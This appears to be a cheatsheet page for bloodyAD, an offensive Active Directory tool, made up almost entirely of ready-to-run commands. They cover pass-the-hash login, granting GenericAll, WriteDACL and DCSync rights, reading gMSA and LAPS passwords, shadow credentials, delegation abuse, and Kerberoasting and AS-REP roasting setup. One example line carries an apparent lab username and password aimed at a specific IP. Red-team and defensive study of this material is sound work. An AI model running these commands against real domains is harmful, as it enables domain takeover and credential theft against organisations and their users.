BloodyAD¶
BloodyAD Cheatsheet¶
Installation¶
Using uv
uv tool install bloodyAD
Using pipx
pipx install bloodyAD
Using pip
pip install bloodyAD
Authentication Methods¶
Password Authentication
bloodyAD --host $dc -d $domain -u $username -p $password [command]
Hash Authentication (Pass-the-Hash)
bloodyAD --host $dc -d $domain -u $username -p :$ntlm_hash [command]
Kerberos Authentication
bloodyAD --host $dc -d $domain -u $username -p $password -k [command]
Certificate Authentication
bloodyAD --host $dc -d $domain -c $cert.pfx -p $cert_password [command]
Enumeration Commands¶
Retrieve User Information
bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username
Get Specific Attributes
bloodyAD --host $dc -d $domain -u $username -p $password get object $target --attr memberOf,servicePrincipalName,userAccountControl
Get MachineQuota of a user
bloodyAD -d inlanefreight.local --host 10.129.229.224 -u aneudy -p Ilovemusic01 get search --filter '(objectClass=computer)' --attr ms-ds-creatorsid
Find Writable Attributes
bloodyAD --host $dc -d $domain -u $username -p $password get writable --detail
Search for Specific Objects
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(objectClass=computer)"
List All Domain Users
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(objectClass=user)"
List All Groups
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(objectClass=group)"
Find Privileged Groups
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(&(objectClass=group)(adminCount=1))"
Get Domain Controllers
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))"
User and Group Management¶
Add User To Group
bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add
Remove User From Group
bloodyAD --host $dc -d $domain -u $username -p $password remove groupMember $group_name $member_to_remove
Change Password
bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password
Force Password Change at Next Logon
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_username pwdLastSet -v 0
Set Password Never Expires
bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f DONT_EXPIRE_PASSWD
ACL Manipulation¶
Give User GenericAll Rights
bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $target_DN $user_to_grant
Add GenericWrite Permission
bloodyAD --host $dc -d $domain -u $username -p $password add genericWrite $target_DN $user_to_grant
WriteOwner
bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_object $new_owner
WriteDACL
bloodyAD --host $dc -d $domain -u $username -p $password add writeDacl $target_DN $user_to_grant
Add DCSync Rights
bloodyAD --host $dc -d $domain -u $username -p $password add dcsync $user_to_grant
GMSA (Group Managed Service Account)¶
ReadGMSAPassword
bloodyAD --host $dc -d $domain -u $username -p $password get object $gmsa_account --attr msDS-ManagedPassword
Decode GMSA Password
bloodyAD --host $dc -d $domain -u $username -p $password get object $gmsa_account --attr msDS-ManagedPassword --raw
UAC (User Account Control) Flags¶
Enable a Disabled Account
bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE
Disable an Account
bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f ACCOUNTDISABLE
Add TRUSTED_TO_AUTH_FOR_DELEGATION Flag
bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION
Remove TRUSTED_TO_AUTH_FOR_DELEGATION Flag
bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION
Set Account as Sensitive (Cannot be Delegated)
bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f NOT_DELEGATED
Kerberos Delegation¶
Add Resource Based Constrained Delegation (RBCD)
bloodyAD --host $dc -d $domain -u $username -p $password add rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$'
Remove RBCD
bloodyAD --host $dc -d $domain -u $username -p $password remove rbcd 'DELEGATE_TO$' 'DELEGATE_FROM$'
Get RBCD Configuration
bloodyAD --host $dc -d $domain -u $username -p $password get rbcd 'TARGET$'
Set Constrained Delegation
bloodyAD --host $dc -d $domain -u $username -p $password set object $account msDS-AllowedToDelegateTo -v "HOST/target.domain.local"
SPN (Service Principal Name) Management¶
WriteSPN
bloodyAD --host $dc -d $domain -u $username -p $password set object $target servicePrincipalName -v 'HTTP/server.domain.local'
Add SPN
bloodyAD --host $dc -d $domain -u $username -p $password add servicePrincipalName $target 'MSSQLSvc/server.domain.local:1433'
Remove SPN
bloodyAD --host $dc -d $domain -u $username -p $password remove servicePrincipalName $target 'MSSQLSvc/server.domain.local:1433'
Shadow Credentials¶
Add Shadow Credentials
bloodyAD --host $dc -d $domain -u $username -p $password add shadowCredentials $target
Clear Shadow Credentials
bloodyAD --host $dc -d $domain -u $username -p $password clear shadowCredentials $target
Add Shadow Credentials with Custom Certificate
bloodyAD --host $dc -d $domain -u $username -p $password add shadowCredentials $target --cert cert.pfx
Computer Account Management¶
Create New Computer Account
bloodyAD --host $dc -d $domain -u $username -p $password add computer $computer_name $computer_password
Delete Computer Account
bloodyAD --host $dc -d $domain -u $username -p $password remove computer $computer_name
MachineAccountQuota - Enumerate
bloodyAD --host $dc -d $domain -u $username -p $password get object 'DC=domain,DC=local' --attr ms-DS-MachineAccountQuota
MachineAccountQuota - Set Value
bloodyAD --host $dc -d $domain -u $username -p $password set object 'DC=domain,DC=local' ms-DS-MachineAccountQuota -v 10
Attribute Modification¶
Modify UPN (User Principal Name)
bloodyAD --host $dc -d $domain -u $username -p $password set object $target userPrincipalName -v $new_upn
Modify Mail Attribute
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user mail -v newmail@domain.local
Modify altSecurityIdentities (ESC14B)
bloodyAD --host $dc -d $domain -u $username -p $password set object $target_user altSecurityIdentities -v 'X509:<RFC822>user@domain.local'
Modify Description
bloodyAD --host $dc -d $domain -u $username -p $password set object $target description -v "New description"
Modify Display Name
bloodyAD --host $dc -d $domain -u $username -p $password set object $target displayName -v "New Display Name"
Deleted Objects and Recovery¶
Find Deleted Objects
bloodyAD --host $dc -d $domain -u $username -p $password get writable --include-del
Search Tombstoned Objects
bloodyAD --host $dc -d $domain -u $username -p $password get search -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065
Restore Deleted Object
bloodyAD --host $dc -d $domain -u $username -p $password set restore $deleted_object_DN
Trust Management¶
Get Trust Information
bloodyAD --host $dc -d $domain -u $username -p $password get object "CN=domain.local,CN=System,DC=domain,DC=local" --attr trustDirection,trustType,trustAttributes
Enumerate Foreign Security Principals
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(objectClass=foreignSecurityPrincipal)"
LAPS (Local Administrator Password Solution)¶
Read LAPS Password
bloodyAD --host $dc -d $domain -u $username -p $password get object $computer_name --attr ms-Mcs-AdmPwd
Read LAPS Expiration Time
bloodyAD --host $dc -d $domain -u $username -p $password get object $computer_name --attr ms-Mcs-AdmPwdExpirationTime
Certificate Services (ADCS)¶
Enumerate Certificate Templates
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(objectClass=pKICertificateTemplate)"
Get Certificate Template Permissions
bloodyAD --host $dc -d $domain -u $username -p $password get object "CN=TemplateName,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=local" --attr nTSecurityDescriptor
Advanced Search Operations¶
Extended Search with Controls
bloodyAD --host $dc -d $domain -u $username -p $password get search -h
Search with Custom LDAP Filter
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(&(objectClass=user)(memberOf=CN=Domain Admins,CN=Users,DC=domain,DC=local))"
Search with Size Limit
bloodyAD --host $dc -d $domain -u $username -p $password get search --filter "(objectClass=*)" --size-limit 100
Useful Combinations and Scenarios¶
Kerberoasting Setup (Add SPN to User)
bloodyAD --host $dc -d $domain -u $username -p $password add servicePrincipalName $target_user "MSSQLSvc/fake.domain.local"
ASREPRoasting Setup (Disable Pre-Authentication)
bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_user -f DONT_REQ_PREAUTH
Unconstrained Delegation Setup
bloodyAD --host $dc -d $domain -u $username -p $password add uac $computer_account -f TRUSTED_FOR_DELEGATION
DNS Admin Abuse
bloodyAD --host $dc -d $domain -u $username -p $password add groupMember "DnsAdmins" $username
Protocol Transition: Constrained Delegation
# Set the TRUSTED_TO_AUTH_FOR_DELEGATION flag
bloodyAD --host $dc -d $domain -u $username -p $password add uac $service_account -f TRUSTED_TO_AUTH_FOR_DELEGATION
# Set the services the account can delegate to (constrained delegation)
bloodyAD --host $dc -d $domain -u $username -p $password set object $service_account msDS-AllowedToDelegateTo -v "CIFS/target.domain.local"
Important Notes¶
- Authentication Options:
- Pass
-kto use Kerberos authentication - Use
-p :hashfor pass-the-hash (NTLM hash only) -
Specify hash format using
-f, e.g.,-f rc4or-f aes256 -
Common Variables:
$dc= Domain Controller IP or hostname$domain= Domain name (e.g., domain.local)$username= Your username$password= Your password$target= Target object (user, computer, group)-
$DN= Distinguished Name (e.g., CN=User,CN=Users,DC=domain,DC=local) -
Output Formats:
- Add
--jsonfor JSON output - Add
--rawfor raw attribute values -
Add
--detailfor detailed information -
Useful Flags:
--help- Show help for specific commands--debug- Enable debug output--no-pass- Don't ask for password (useful for Kerberos)-
--dc-ip- Specify DC IP directly -
Common UAC Flags:
ACCOUNTDISABLE- Account is disabledDONT_EXPIRE_PASSWD- Password never expiresDONT_REQ_PREAUTH- Don't require Kerberos pre-authenticationTRUSTED_FOR_DELEGATION- Unconstrained delegationTRUSTED_TO_AUTH_FOR_DELEGATION- Protocol transitionNOT_DELEGATED- Account is sensitive, cannot be delegated-
PASSWORD_EXPIRED- Password has expired -
LDAP Search Controls:
1.2.840.113556.1.4.2064- Show deleted objects1.2.840.113556.1.4.2065- Show recycled objects1.2.840.113556.1.4.801- Show deactivated link1.2.840.113556.1.4.417- Show extended DN